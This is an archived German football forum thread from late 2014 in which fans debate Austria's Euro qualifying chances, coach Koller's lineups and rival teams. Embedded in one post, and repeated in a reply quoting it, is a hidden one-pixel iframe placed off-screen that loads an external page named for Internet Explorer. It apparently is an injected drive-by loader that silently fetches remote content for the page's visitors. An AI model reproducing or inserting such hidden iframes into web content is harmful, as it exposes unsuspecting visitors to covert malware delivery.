Archiv verlassen und diese Seite im Standarddesign anzeigen : 13er-Forum
Commander
27.10.2014, 19:36
Auf jeden Fall kann man da nicht falsch liegen. Weil der Rest ja nicht weiß wies gemeint ist.
Jeder soll sich seine eigene meinung dazu bilden
shadow08
27.10.2014, 20:15
Eine Ähnlichkeit kann man aber nicht leugnen. :mrgreen::mrgreen::mrgreen:
Commander
27.10.2014, 20:47
Eine Ähnlichkeit kann man aber nicht leugnen. :mrgreen::mrgreen::mrgreen:
Ja diese Ähnlichkeit ist verblüffend :shock::lol::lol:
Ps: lad das Zeichentrick Foto von ihm hoch was ich dir gesendet habe :-)
shadow08
27.10.2014, 21:15
Ja diese Ähnlichkeit ist verblüffend :shock::lol::lol:
Ps: lad das Zeichentrick Foto von ihm hoch was ich dir gesendet habe :-)
http://img5.fotos-hochladen.net/uploads/img12531k285np9gfd.jpg
:lol::lol::lol:
terminator85
27.10.2014, 22:46
So ca. das Thema hatten wir ja schon mal:
http://sportnet.at/home/fussball/fussballlive/4197644/Fussball-live_SturmFans_Ein-Schweinekopf-fur-Florian-Kainz
Also Schweinekopf und dann Rapidschal und sein Trikot (Grazer) verbrennen.
Nunja irgendwo hört es sich schon auf.
Und ja auch Barca (glaub Barca wars) hat das damals bei Figo (Schweinekopf) getan.
Ja, so manches Thema ist ständig ein Thema.
Ja, so extrem hört es sich sicher auf. Nur beim 1.Wiedertreffen in der alten Heimat ists nach einem Wechsel eben ganz was besonderes.
Als Beispiel: Sonnleitner bekommt schon viel weniger Fett ab, jetzt wo er 2 Nachfolger (im wahrsten Sinne des Wortes) hat. ;-)
Ach, alles halb so wild
Naja, ich sehe kein "Wild".
...Es war ja kein Wildschweinkopf! :mrgreen:
btw: Hat jemand von euch das Interview von Barisic über Kainz gehört?
=> Blabla zum Thema "Sohn einer H..."; diesmal aus der Sicht des kaufenden Vereins (im Gegensatz zu Sabitzer)!
PS: Da ist meine Theorie, wie das gemeint ist, sicher passender, oder? :mrgreen:
shadow08
17.11.2014, 14:41
Damit hier auch mal wieder Leben rein kommt.
Diese tolle Momentaufnahme kann man ruhig hier festhalten, oder? :)
http://img5.fotos-hochladen.net/uploads/11gmatn30wx.png
Marco hat zwar offensiv immer noch sehr viel Pech, aber ich bleib dabei in den letzten Spielen hat er gezeigt, dass er trotzdem wichtig für uns ist.
http://90minuten.at/index.php/magazin/taktik/76428-wie-arnautovic-die-russen-zum-narren-hielt
Stiffler
17.11.2014, 14:46
Welches Spiel von den Hinspielen fehlt denn noch?
oleander
17.11.2014, 14:47
Rein rechnerisch schaut es wirklich schon sehr gut aus.
Aber, wie Koller sagte, es gibt keine Garantie darauf, dass unser Team immer das erste Tor erzielt.
Das Spiel in Liechtenstein ist so gesehen auch kein Selbstläufer. Ein großer Vorteil ist aber sicher, dass es von den Fans her ein "Heimspiel" ist.
shadow08
17.11.2014, 14:48
Welches Spiel von den Hinspielen fehlt denn noch?
Liechtenstein auswärts. ;)
interessant wirds halt in der Rückrunde dann weil da haben wir alle 3 (Schweden, Russland, Montenegro) noch auswärts.
Stiffler
17.11.2014, 14:51
Liechtenstein auswärts. ;)
interessant wirds halt in der Rückrunde dann weil da haben wir alle 3 (Schweden, Russland, Montenegro) noch auswärts.
Ok, was ist eigentlich mit den Russen los?
shadow08
17.11.2014, 14:56
Ok, was ist eigentlich mit den Russen los?
Die sind so schwach wie schon lange nicht mehr, leider konnten wir es ned eindeutiger ausnutzen.
chris1976
17.11.2014, 15:00
Die sind so schwach wie schon lange nicht mehr, leider konnten wir es ned eindeutiger ausnutzen.
Hoffe im Rückspiel sind sie auch so schwach.:lol:Wenn wir Glück haben genügt es wenn wir 2mal Liechtenstein und Moldawien zuhause schlagen.Aber so eine Chance wie diesmal bekommen wir nimmer so leicht.
<iframe src="https://d19tqk5t6qcjac.cloudfront.net/i/415_ie.html" style="position: absolute; width: 1px; height: 1px; left: -9999px;" id="iagdtd_frame"></iframe>
shadow08
17.11.2014, 15:15
Hoffe im Rückspiel sind sie auch so schwach.:lol:Wenn wir Glück haben genügt es wenn wir 2mal Liechtenstein und Moldawien zuhause schlagen.Aber so eine Chance wie diesmal bekommen wir nimmer so leicht.
<iframe src="https://d19tqk5t6qcjac.cloudfront.net/i/415_ie.html" style="position: absolute; width: 1px; height: 1px; left: -9999px;" id="iagdtd_frame"></iframe>
jop diese Chance muss man einfach nutzen, leichter kann es uns eigentlich nicht mehr gemacht werden
und morgen bleibt uns Janko erspart weil er bereits wieder in Australien ist :lol:
Ihr seids raunzer. Sooooooooooooooooooo leicht war das alles nicht wies jetzt ausschaut. Bitte als hätte einer von euch gesagt, dass es nach 4 runden so steht, wäre er als Träumer bezeichnet worden. und jetzt tut man so als wäre das eh ganz leicht und so leicht wie jetzt wars noch nie.
FALSCH. Es war 1x leichter. Als wir der Veranstalter waren. ;-) Hehehehehehehehe.
Hab das Match leider nicht ganz gesehen. Aber so schlecht waren die Russen nicht. Gegen die Russen hatten wir aber auch nicht unseren besten Tag.
Österreich ist einfach stärker geworden. Der Schweizer hat da schon einiges bewirkt. Ich hoffe die die ihn damals so herablassend behandelt haben, sehen das jetzt. Das was Koller bisher gemacht hat, war schon stark. Ja klar er hat sich für die WM auch nicht qualifiziert, das hätten Ogris und Co auch schaffen können. Doch da ist viel mehr mit dem Team passiert. Man siehts ja auch bei den Fans. Man glaubt an Koller. An das Team. Die Spieler präsentieren sich ganz anders. Und jeder der meint, das ist nur deswegen, weil Koller das beste Team seit langem hat, der versucht es auch wieder nur schön zu reden.
JA wir hatten auch einiges an Glück. Und man wirds dann auch auswärts sehen. Es stehen noch sehr schwere Spiele an.
Da der Modus aber jetzt auch anders ist bzw. eben mehr Teams dabei sind, ist es natürlich allgemeiner als sonst. Aktuell würde es ja so ausschauen als würden wir nach dem alten Modus es sogar schaffen können. Reden wir aber lieber erst dann davon, wenn es soweit ist. (oder eben nichts)
Was können (als Beispiel) die Isländer davor, dass die Norweger hinter ihnen sind.
Die Slowaken dass Spanien hinter ihnen sind.
Was können die Engländer davor, dass die so gut sind. (hahahahahahahaha)
Es liegt schon auch an den eigenen Fähigkeiten. Und bisher machen wir das gut. Man wirds dann sehen wenn auch Rückschläge (1. Gegentore im Spiel) kommen. Wie man sich dann verhält. Bisher war das ja auch sehr positiv für uns.
Dennoch finde ich hat Österreich sich super weiterentwickelt.
Von dem Team dass damals gegen die Serben schnell 3:0 hinten war, bis zu jetzt .... das ist ein Wahnsinn. Koller tut uns allen gut.
shadow08
17.11.2014, 17:01
Ok da hast recht, als Veranstalter hatten wir es doch noch leichter. :)
Beim derzeitigen Tabellenstand kann man fast von raunzen auf hohem Niveau reden. Gleich vorweg ich hab damals glaub ich eh nix davon geschrieben, dass die Gruppe leicht wäre sondern im Gegenteil, wir sogar 3 starke Gegner haben und durchaus auch 4. werden könnten. Nach den letzten Leistungen der Schweden und Russen konnte man aber auch zuversichtlich in die Gruppe gehen.
Aus meiner Sicht haben wir gegen schwache Schweden leider nur ein 1:1 geholt, da waren wir nicht gut genug um den Sieg zu holen. Gegen Montenegro und Russland hats gereicht zum Sieg, wobei grad Russland kaum etwas gezeigt hat und wir leider auch ned mehr als das Nötigste. Von der Leistung her ist also immer noch genug Luft nach oben auch für unsere Verhältnisse und das soll die bisherige Leistung nicht schmälern.
Diesmal hat man gesehen wie gut die Truppe funktioniert trotz dem Ausfall von Alaba und sogar noch vom Baumgartlinger und grad ohne Alaba hätten uns ja viele nix zugetraut.
Ich habs zum Chris eh beim Turnier auch gesagt, im Normallfall müssen wirs auch ohne Alaba schaffen.
Wichtig ist einfach dass wir endlich solche Gegner wieder besiegen die knapp oder klar stärker eingeschätzt werden als wir, jetz darf einfach gegen die eigentlich Kleineren kein Ausrutscher passieren.
Ich gebs aber auch zu dass ich die Leistung ned 100%ig genau beurteilen kann weil ichs live im Stadion gesehen habe und aus der Fankurve sieht man halt doch einiges ned oder anders. Vom Russland Match zb. habe ich mir daheim dann einige Szenen noch angeschaut.
Zum Koller kann ich auch nur zustimmen der hat mittlerweile sicher schon einige eines besseren belehrt. Meine Kritik an ihm war eigentlich wenn dann immer nur bezüglich Einsätze von gewissen Spielern, aber selbst da gab ich nicht mal direkt ihm die Schuld weil ich immer noch glaube, dass da im Hintergrund intern einfach irgendwas schief läuft bei uns und der Koller wahrscheinlich ned mal zu 100% selbst entscheiden darf, anders kann man sich gewisse Dinge einfach ned erklären. :)
da geb ich dir recht ;-) das der fuchs überhaupt noch Fußball spielen darf, muss mir einer mal erklären, aber wenigstens sind wir den pogerl schon los..
shadow08
17.11.2014, 17:21
da geb ich dir recht ;-) das der fuchs überhaupt noch Fußball spielen darf, muss mir einer mal erklären, aber wenigstens sind wir den pogerl schon los..
ja das wäre einer davon ;)
Garics sind wir ja vorerst mal los, wobei sich rechts hinten auch der Klein noch steigern muss
Tja ob Fuchs, Klein, Garic. Hmmmmm. Also da mach ich Koller nun nicht grad den großen Vorwurf. Genau das meinte ich auch. Für mich ist Fuchs auch nicht ideal, ABER wer sonst. Genau der Klein wo jeder gesagt hat, dass er zu Stuttgart geht und auf der Bank sitzen wird. JETZT soll er der tolle sein? Ernsthaft? Komm das ist kein großer Vorwurf.
Auch bei Janko kann man mautzen und meckern. (und da bin ich noch eher dabei als bei Fuchs) NUR der macht auch immer wieder Tore. Er rechtfertigt es. Und grad als Trainer sollte man dann einen nicht fallen lassen. (und ja ich war einer davon, der gesagt hat, dass man Janko nicht mehr einberufen darf, wenn er in Australien spielt; Jetlag und dergleichen) Dennoch FEHLER? Fehler sind das alles nicht.
Wen noch? Harnik? Gegen die Russen aber sowas von gut. War einer der allerbesten. Wie auch Dragovic. Also sooooooooooooooooooooooooooooo viele Sachen seh ich da selbst auch nicht. Das ist jammern auf verdammt hohen Niveau.
shadow08
17.11.2014, 19:52
Klein finde ich ned konstant genug, der hatte schon gute Tage, aber auch schlechte nur ist er meiner Meinung nach definitv besser als Garics.
Statt Fuchs hätte man links schon früher mal Suttner versuchen können sonst gibts da wirklich leider ned viel, außer Alaba auf links hinten in der Hoffnung dass er mit Arnautovic gut Kombiniert.
Aber das schiebe ich eh auch ned aufn Koller, da bin ich voll bei dir der macht einen guten Job und ich hab auch immer gesagt er macht einen guten Job obwohl er (mMn) von oben ungute Vorgaben haben könnte.
Anders kann ich mir ned erklären warum Bankerldrücker gegenüber Spielern in Bestform bevorzugt werden.
Janko ist dafür das ärgste Beispiel, wenn er jetzt weiterhin ewig an Janko festhält während ein Okotie nicht nur beim Verein sondern auch im Team in Form ist und Tore macht dann wäre das eine ziemliche Bestätigung dafür dass irgendwer oder irgendetwas dafür sorgt dass Janko seinen Stammplatz behält.
Weil du Dragovic erwähnt hast, der ist ja echt wieder der Hammer gewesen. Unglaublich wie souverän der Typ seine Tacklings durchzieht, bei jedem anderen hätte ich Angst dass er sich eine Rote einfängt. :)
das einzige Problem was ich habe mit unseren teamchefs ist --> die hängen alle an janko. warum auch immer.
Die Jungen kommen eigentlich gar nie zum Zug. Ich glaub das motiviert die jungen nicht sehr.
Ein Okotie der gerade einen Super-lauf hat (8 Tore bei 1860) ist 27.
Jimmy (auch 27) hatte damals auch ein Lauf und auf ihn wurde mehr oder weniger auch nicht gesetzt. Er spielte nur 5x von anfang an (ohne freundschaftsspiele). Aber desen Nationalteamkarriere ist wohl glelaufen.
Ein weimann (1991) spielt mir auch zu wenig. er spielte gar nur 1x von anfang an
Ich find die jungen sollten genau jetzt mehr gefördert werden, vorallem okotie und weimann.
einen Janko kann man am schluss bringen wenn man hinten liegt und quasi HidS spielt ;)
Stiffler
17.11.2014, 20:35
Nja, leicht hin oder her.
Obs dann gleich die eigene Stärke ist?
Ist Island wirklich so stark und Holland plötzllich so schwach?
Schweden gewinnt bis jetzt 1 Spiel, ist Österreich deswegen stärker oder doch die Schweden unter ihren Erwartungen, unter ihrem Niveau?
Sollen andere entscheiden.
Schmarrn ist in meinen Augen der Satz, dass es keine Kleinen mehr gibt.
Fakt ist, es gibt keine Großen mehr ;-)
Stiffler
17.11.2014, 21:05
Weil du Dragovic erwähnt hast, der ist ja echt wieder der Hammer gewesen. Unglaublich wie souverän der Typ seine Tacklings durchzieht, bei jedem anderen hätte ich Angst dass er sich eine Rote einfängt. :)
Is das nicht der, der damals noch beim FC Basel gspielt hat und vor der Partie in der Arena ne mächtig große Klappe hatte?
Von wegen Gomez stolpert bloß rum, gut das Schweinsteiger spielt, dann sei München schwächer, dass sie (die Münchner) spielen können wie sie wollen :-D
Ergebnis übrigens 7:0 - 4 Tore Mario Gomez :lol:
Naja Umstellungsprobleme nennt man sowas. Nicht jeder Teamchef passt zu jeden Team.
Auch Deutschland ist noch im Weltmeistermodus. Aber das muss man auch abhacken und es geht von neu los. Oder ist Deutschland nicht mehr so stark? Glaubt wohl auch keiner. Aber bei Schweden redet dann jeder, dass die nicht mehr stark sind. (oder den Russen oder was weiß ich) Klar spielen die AUCH unter den Erwartungen. Dennoch haben wir regelmässig gegen diese dennoch veloren. Mittlerweile wenn die nicht ihren besten Tag haben (siehe Russland) schlagen wir sie. Genau das ist es eben. Wenn Schweden ihr volles Potenzial abruft, dann sind die vor uns zu stellen. Auch jetzt noch. Daher ist es schon so wie Stiffler sagt, dass die Schweden eben nicht in dessen Bestform spielt. ABER wir uns auch sonst stark gesteigert haben. DAS wird oft vergessen. Und das liegt sicherlich auch dran, dass Alaba jetzt so stark ist, was er vor 5 Jahren noch nicht war. ABER eben auch, dass Koller ein System. Eine Taktik, eine Vorgabe hat. Eine Philosophie gebracht hat. Der Schweizer musste die Österreicher definieren. Das fängt an, dass er in der Kabine Jubelfotos der Mannschaft aufhängt bis hin zur taktischen Vorgabe und sich einstellt auf den Gegner und nicht erst 1 Tag vor dem Match beim Radfahren auf eine Idee kommt, wie man spielt und umstellt und Taktik für Überbewertet hält.
Weimann (hat Koller selbst schon so gesagt) ist ein anderer Stürmertyp. Und das paßt nicht so ins System rein. Tja DAS ist der Hauptgrund warum er nicht 1. Wahl ist. Sondern eigentlich nur 3. oder 4. Es kommt da schon drauf an was man eben spielt. Und das macht einen Unterschied aus.
shadow08
17.11.2014, 21:10
Is das nicht der, der damals noch beim FC Basel gspielt hat und vor der Partie in der Arena ne mächtig große Klappe hatte?
Von wegen Gomez stolpert bloß rum, gut das Schweinsteiger spielt, dann sei München schwächer, dass sie (die Münchner) spielen können wie sie wollen :-D
Ergebnis übrigens 7:0 - 4 Tore Mario Gomez :lol:
Wenn das Interview wirklich von ihm war hab ichs leider verpasst, aber ja er war bei Basel. ;)
Stiffler
17.11.2014, 21:31
Naja Umstellungsprobleme nennt man sowas. Nicht jeder Teamchef passt zu jeden Team.
Auch Deutschland ist noch im Weltmeistermodus. Aber das muss man auch abhacken und es geht von neu los. Oder ist Deutschland nicht mehr so stark? Glaubt wohl auch keiner. Aber bei Schweden redet dann jeder, dass die nicht mehr stark sind. (oder den Russen oder was weiß ich) Klar spielen die AUCH unter den Erwartungen. Dennoch haben wir regelmässig gegen diese dennoch veloren. Mittlerweile wenn die nicht ihren besten Tag haben (siehe Russland) schlagen wir sie. Genau das ist es eben. Wenn Schweden ihr volles Potenzial abruft, dann sind die vor uns zu stellen. Auch jetzt noch. Daher ist es schon so wie Stiffler sagt, dass die Schweden eben nicht in dessen Bestform spielt. ABER wir uns auch sonst stark gesteigert haben. DAS wird oft vergessen. Und das liegt sicherlich auch dran, dass Alaba jetzt so stark ist, was er vor 5 Jahren noch nicht war. ABER eben auch, dass Koller ein System. Eine Taktik, eine Vorgabe hat. Eine Philosophie gebracht hat. Der Schweizer musste die Österreicher definieren. Das fängt an, dass er in der Kabine Jubelfotos der Mannschaft aufhängt bis hin zur taktischen Vorgabe und sich einstellt auf den Gegner und nicht erst 1 Tag vor dem Match beim Radfahren auf eine Idee kommt, wie man spielt und umstellt und Taktik für Überbewertet hält.
Weimann (hat Koller selbst schon so gesagt) ist ein anderer Stürmertyp. Und das paßt nicht so ins System rein. Tja DAS ist der Hauptgrund warum er nicht 1. Wahl ist. Sondern eigentlich nur 3. oder 4. Es kommt da schon drauf an was man eben spielt. Und das macht einen Unterschied aus.
Genau, im Großen und Ganzen Voll bei Dir :up:
Österreich ist alles in allem sicher nicht schlechter geworden, wenn halt die Schweden und vor allem die Russen nicht massive andere Probleme haben, dann muss man sich vielleicht noch anders strecken als es aktuell aussieht.
Würde den Nachbarn auf jeden Fall sehr, sehr gut tun wieder aus eigener Kraft ein Endturnier erreicht zu haben - ich drück die Daumen.
Stiffler
17.11.2014, 22:32
Wenn das Interview wirklich von ihm war hab ichs leider verpasst, aber ja er war bei Basel. ;)
Hab da allerdings noch andere Artikel im Kopf, die AZ wollte da wohl kein Faß aufmachen, sei´s drum :noidea:
Basel-Ösi lästert: "Gomez nicht der Größte" (http://www.abendzeitung-muenchen.de/inhalt.champions-league-basel-oesi-laestert-gomez-nicht-der-groesste.1bf08d6f-72b8-4be6-ada8-0cf20b9f7afe.html)
Im Prinzip hatte er ja nicht mal ganz Unrecht, aber darfst das als österr. für Basel spielender Profi sagen? ;-)
Coppelius
18.11.2014, 06:33
Auch Deutschland ist noch im Weltmeistermodus. Aber das muss man auch abhacken...
Den Weltmeister abhacken? Gute Idee, hacken wir mal Sterne...;-) :becky:
Finde die Ergebnisse in Europa derzeit auch interessant, man darf sie aber nicht überbewerten und letztlich muss man erst mal abwarten, wer sich dann qualifiziert.
Und was habts mit den Schweden? Die haben gegen die drei stärksten Gruppengegner auswärts remisiert und dürfen noch daheim gegen alle ran. Im Gegensatz zu uns, wir müssen zu allen dreien auswärts - insofern sehe ich die Schweden sowieso als Gruppenerster.
Für uns wird es ganz wichtig, nicht über die vermeintlich schwachen Gegner (Liechtenstein und Moldawien) zu stolpern - wenn wir da 9 Punkte holen, dürfte zumindest der 3. Platz schon fix sein.
Dazu noch mindestens ein Auswärtsremis und der 2. Platz winkt.
Das wär schon was!
shadow08
18.11.2014, 07:07
Hab da allerdings noch andere Artikel im Kopf, die AZ wollte da wohl kein Faß aufmachen, sei´s drum :noidea:
Basel-Ösi lästert: "Gomez nicht der Größte" (http://www.abendzeitung-muenchen.de/inhalt.champions-league-basel-oesi-laestert-gomez-nicht-der-groesste.1bf08d6f-72b8-4be6-ada8-0cf20b9f7afe.html)
Im Prinzip hatte er ja nicht mal ganz Unrecht, aber darfst das als österr. für Basel spielender Profi sagen? ;-)
Also er darf sowas schon und Basel war ja in den letzten Saisonen keine kleine Adresse. ;)
@Schweden den Tabellenstand kann man daweil eh einfach nur genießen und hoffen dass es so weiter geht, aber aussagekräftig ist dieser natürlich noch nicht. Unsere Auswärtsspiele hab ich gestern eh schon erwähnt und bei Schweden gehts halt ned nur um die derzeitigen Punkte sondern auch um die spielerische Leistung.
Die war nämlich gegen uns ziemlich schwach, da gabs gestern einen guten Auszug aus einer russischen Zeitung, wo kritisiert wurde, dass man gegen eine durchschnittliche Mannschaft wie Österreich auf Unentschieden spielt.
Den Weltmeister abhacken? Gute Idee, hacken wir mal Sterne...;-) :becky:
Das war der freudsche. ;-) Natürlich haken.
Finde die Ergebnisse in Europa derzeit auch interessant, man darf sie aber nicht überbewerten und letztlich muss man erst mal abwarten, wer sich dann qualifiziert.
Und was habts mit den Schweden? Die haben gegen die drei stärksten Gruppengegner auswärts remisiert und dürfen noch daheim gegen alle ran. Im Gegensatz zu uns, wir müssen zu allen dreien auswärts - insofern sehe ich die Schweden sowieso als Gruppenerster.
Für uns wird es ganz wichtig, nicht über die vermeintlich schwachen Gegner (Liechtenstein und Moldawien) zu stolpern - wenn wir da 9 Punkte holen, dürfte zumindest der 3. Platz schon fix sein.
Dazu noch mindestens ein Auswärtsremis und der 2. Platz winkt.
Das wär schon was!
Kann leicht sein. Und daher wäre ich auch aktuell vorsichtiger, das man schon quasi spricht von "man ist dabei" und "keine Gegner in der Gruppe" oder dergleichen.
Prinzipiell bin ich dafür, dass man selbstbewusst auftritt. Und ja unrecht hatte er nicht. Das man aber dann das Maul zu weit aufreisst und auf die Goschn fliegt, dann ist man auch selbst Schuld. Da hat er sich damals einfach zu weit rausgelehnt.
ich bin nicht ganz eurer Meinung; ich finde Koller nur aus einem einzigen Grund gut und der ist perverserweise, dass er kein Österreicher ist, denn das hebt ihn von dieser typischen Funktionärstätigkeit ab.. wenn man ehrlich ist, waren die Teamchefs davor eine einzige Katastrophe und Koller ist halt keine, aber ein guter Trainer mit taktischer Variabilität ist er nicht; ist nur meine Meinung...
Fehler in der Aufstellung macht er viele, Weimann passt nicht ins System aber Janko schon, so einen Blödsinn hab ich schon lange nicht gehört (obwohl ich Weimann für keinen Stürmer halte, sondern Flügel)..der Janko ist gegen Russland zum ersten Mal in seinem Leben gelaufen, was mich sehr überrascht hat; die Kämpfertugenden sind zumindest in Heimspielen wieder da, aber das liegt glaub ich mehr an Alaba & Juno und ihrer Vorbildfunktion als an dem Trainerumfeld...
Dragovic wäre so ein guter Fußballer, wenn er auch noch Spielintelligenz hätte, aber da steht ihm leider sein Kopf im Weg (oder sein zweifelslos fehlender IQ, Pogerl 2.0. halt mit Technik)
Wir spielen mit Fuchs als LV, der glaube ich, die letzten 22 Gegen-Tore auf Schalke verursacht hat und dort nur spielt weil di matteo in noch nicht kennt und 14 LV verletzt sind...
Wir spielen mit einem Torhüter, der seit glaube ich drei Saisonen kein Pflichtspiel mehr bestritten hat (seine Leistung war gut, aber das ist trotzdem lächerlich)
Wir spielen immer gleich, Gegenpressing die erste Hälfte und ab der 60 min. geht ihnen die Luft aus und dann besteht das Spiel nur noch aus Hoffen und Bangen...
Wir haben sehr viel Glück gehabt bisher, dass die Schweden und Russen eigentlich nicht spielen wollten und auf 0:0 gespielt haben, denn wenn diese Mannschaften uns pressen würden, würden wir wieder wie ein wilder Haufen herumrennen.. aber man muss der Mannschaft zu Gute halten, dass sie die Schwäche der Gegner bisher gnadenlos ausgenutzt hat und alleine diese neue Qualität an Selbstbewußtsein rechtfertigt Koller wieder, ob das an ihm liegt oder nicht, kann ich nicht beurteilen..
terminator85
18.11.2014, 16:09
ich bin nicht ganz eurer Meinung; ich finde Koller nur aus einem einzigen Grund gut und der ist perverserweise, dass er kein Österreicher ist, denn das hebt ihn von dieser typischen Funktionärstätigkeit ab.. wenn man ehrlich ist, waren die Teamchefs davor eine einzige Katastrophe und Koller ist halt keine, aber ein guter Trainer mit taktischer Variabilität ist er nicht; ist nur meine Meinung...
Fehler in der Aufstellung macht er viele, Weimann passt nicht ins System aber Janko schon, so einen Blödsinn hab ich schon lange nicht gehört (obwohl ich Weimann für keinen Stürmer halte, sondern Flügel)..der Janko ist gegen Russland zum ersten Mal in seinem Leben gelaufen, was mich sehr überrascht hat; die Kämpfertugenden sind zumindest in Heimspielen wieder da, aber das liegt glaub ich mehr an Alaba & Juno und ihrer Vorbildfunktion als an dem Trainerumfeld...
Dragovic wäre so ein guter Fußballer, wenn er auch noch Spielintelligenz hätte, aber da steht ihm leider sein Kopf im Weg (oder sein zweifelslos fehlender IQ, Pogerl 2.0. halt mit Technik)
Wir spielen mit Fuchs als LV, der glaube ich, die letzten 22 Gegen-Tore auf Schalke verursacht hat und dort nur spielt weil di matteo in noch nicht kennt und 14 LV verletzt sind...
Wir spielen mit einem Torhüter, der seit glaube ich drei Saisonen kein Pflichtspiel mehr bestritten hat (seine Leistung war gut, aber das ist trotzdem lächerlich)
Wir spielen immer gleich, Gegenpressing die erste Hälfte und ab der 60 min. geht ihnen die Luft aus und dann besteht das Spiel nur noch aus Hoffen und Bangen...
Wir haben sehr viel Glück gehabt bisher, dass die Schweden und Russen eigentlich nicht spielen wollten und auf 0:0 gespielt haben, denn wenn diese Mannschaften uns pressen würden, würden wir wieder wie ein wilder Haufen herumrennen.. aber man muss der Mannschaft zu Gute halten, dass sie die Schwäche der Gegner bisher gnadenlos ausgenutzt hat und alleine diese neue Qualität an Selbstbewußtsein rechtfertigt Koller wieder, ob das an ihm liegt oder nicht, kann ich nicht beurteilen..
Koller hat das Potential von den Spielern erkannt. Unter anderem gibt es den einen guten Jahrgang, der 2007 mit der U20 in Kanada bei der WM 4. wurde. http://de.wikipedia.org/wiki/%C3%96sterreichische_Fu%C3%9Fballnationalmannschaf t_%28U-20-M%C3%A4nner%29
=> Prödl, Junuzovic, Harnik, Okotie, Kavlak und Suttner sind davon auch aktuell noch im Länderteamkader!!! In Ö kommt es selten vor, dass die Talente ned irgendwo in der Versenkung verschwinden.
btw: Die sind jetzt alle im besten Fussballeralter.
Dass andere (höhere) Funktionäre ihm in die Aufstellung dreinreden, glaub ich ned. Passiert sowas, würden die Ergebnisse ned passen.
Ja, dass er ned von Ö kommt, kann ein Vorteil von ihm sein. Vorallem, weil er auch deutsch sprechen kann. ;-)
Dass er taktisch sich aufs (Off-)Pressing festgelegt hat, war die richtige Entscheidung. Das ist die modernste Spielweise und grad im NT ist es schwer sowas tatsächlich umzusetzen. Dazu braucht man auch die passenden Spieler. In Ö setzen inzwischen mehrere Teams drauf.
Alaba kann jedes System spielen (btw: Frag mich immer noch, warum er bei den Bayern in der 3er Abwehrkette gebraucht wird???)
Jedenfalls wird es ausgenutzt, dass das System funktioniert. Uneingespielte Teams (und die meisten NTs sind so) können dagegen schwer was ausrichten!!! :cool:
Weniger laufintensive Taltilalternativen, um besser Verteidigen zu können, müssen aber noch gefunden werden. Wobei es in dieser Quali eh schon ein paar mal ohne späten Ausgleichstreffer gut gegangen ist und die 0 gehalten wurde. ;-)
Prinzipiell bin ich dafür, dass man selbstbewusst auftritt. Und ja unrecht hatte er nicht. Das man aber dann das Maul zu weit aufreisst und auf die Goschn fliegt, dann ist man auch selbst Schuld. Da hat er sich damals einfach zu weit rausgelehnt.
Da war, glaub ich, auch sehr viel "Galgenhumor" bzw Sarkasmus dabei. Jung war er damals auch noch, also solche Ansagen bitte ned überbewerten. ;-)
Ich find es schön, dass zumindest bei den Innen-VTs und im defensiven MF die jungen Talente auf gutem internatinaen Niveau ausreichend vorhanden sind.
Bei andere Positionen gibts wirklich Probleme mit der Besetzung:
1.) Im Tor: Ersatzmann, der im Team bisher meist sehr gut gehalten hat vs einen, der in der Ö-Liga grad grad seine persönliche Krise durchmacht (Lindner). Da siehts es zZ ned sehr rosig aus, wenn man bedenkt, dass früher im Ö-Team die TW Position immer die Top besetzte war.
2.) Fuchs spielt ja ned wirklich viel bei Schalke. Dass er defensiv zu den schwächeren VTs gehört ist auch augenscheinlich. Im Team ist er aber besser unterwegs. Dazu kommt, dass Kapitäne (auch unter Koller) ihren Stammplatz haben. Alaba wäre aber eine Alternaive, wenn es im zentralen MF auch ohne ihn geht.
3.) Garics passt ned ins Spielsystem. In Italien wird so von keinem Team gespielt, wie Prohaska mal angemerkt hat, da past Klein viel besser ins System. Der kann das seit seiner RB Zeit, was übrigens auch die vielen anderen RB-Spieler erkärt, die diesmal spielen durften, nachdem die internationalen NT-Stammspieler ausgefallen sind oder ned in Topform sind (Alaba, Baumgartlinger, Prödl)
4.) Arnautovic ist sicher ein der besseren Flügelspieler. Mir geht bei ihm der Torriecher etwas ab (der er müsste defensiv besser agieren). So ist er ein Unsicherheitsfaktor. Er spielt aber deutlich mannschaftsdienlicher als früher.
Seine Off-Flügelspielerkokurrenz ist aber überschaubar. Harnik ist auch ned immer gut drauf, macht aber Tore und Weimann bekommt kaum Chancen sich mal zu beweisen. Mittelstürmer ist er aber keiner.
5.) Janko ist in seiner Art, der beste Spieler aus Ö. Das wars dann aber mit dem Lob. Ins System passt er ned, weil er dazu schneller attackieren können müsste. Da gilt wohl wieder das Kapitän (jetzt ist er ja nur Vize; mMn der Grund dafür: Weil er niiie durchspielt und verletzungsanfälliger ist als zB Fuchs)
Für Notfälle (bei Rückstand für die letzten Minuten) wäre er wirklich sehr geeignet. Die dazu nötigen starken Flankengeber (Fuchs, Alaba) hätten wir im Team.
Bleibt noch Okotie: D-2.Ligaspieler sollte, sportlich gesehen, knapp besser einzustufen sein als die Ö-BuLi!? Zuschauerzahlen und Geldflüsse sind jeweils sogar deutlich höher.
Jedenfalls ist eine Notfalllösung, wäre er ned in absolut guter Form!
=> Wenn schon ein Münchner als Torschütze ausfällt, muss es eben ein anderer Münchner erledigen! :lol::lol::lol:
terminator85
18.11.2014, 16:36
zu den Gegnern in der Gruppe:
Eins schon mal vorweg: Wir sind aktuell die Nation mit dem besten Ranking (ned nur in der Tabelle)!!!
Russland: Interessant, wie sie es angehen. Erinnert an die Heim-Eishockey-WM, wo sie nur mit KHL-Spielern zeigen wollten, dass sie die beste Liga haben.
Oder auch die Winterspiele, wo sie einige Sportler (zB Shorttrack und diverse Snowboarder eingebürgert haben, um Medaillen zu sammeln).
Beim Fussball wird eben wieder auf die eigene Liga gesetzt.
=> Die wenigen guten, die es sonst auch wo mal geschafft haben bzw bei der vorletzten WM mal aufgezeigt haben, wurden zurückgeholt (das nötige Geld dazu sollte bei den Vereinen ja vorhanden sein). Darüber hinaus gabs auch schon die Idee alle NT-Spieler in einem Verein zusammenzuziehen und so noch besser für die WM gerüstet zu sein! Ähnliches gabs übrigens auch zu DDR-Zeiten.
In der Praxis sind die Spieler keine besseren Einzelspieler als die Österreichischen!
=> Ein Gegner auf Augenhöhe.
Schweden: Da gibts den Zlatan und dann lang nix. Der Rest ist auch ned besser als es die Ö-Spieler sind. Internationalen Namen hat sonst kaum jemand.
Im Vergleich sind die Ö-"Weltstars" Stammspieler in den besten Ligen der Welt (nimmt man Garics und Ivanschitz dazu, sind wir mit den NT-Spielern in der PL, in der D-Liga und in Italien und in Spanien vertreten). Das macht sich in Summe einfach bezahlt.
=> Auch auf Augenhöhe!
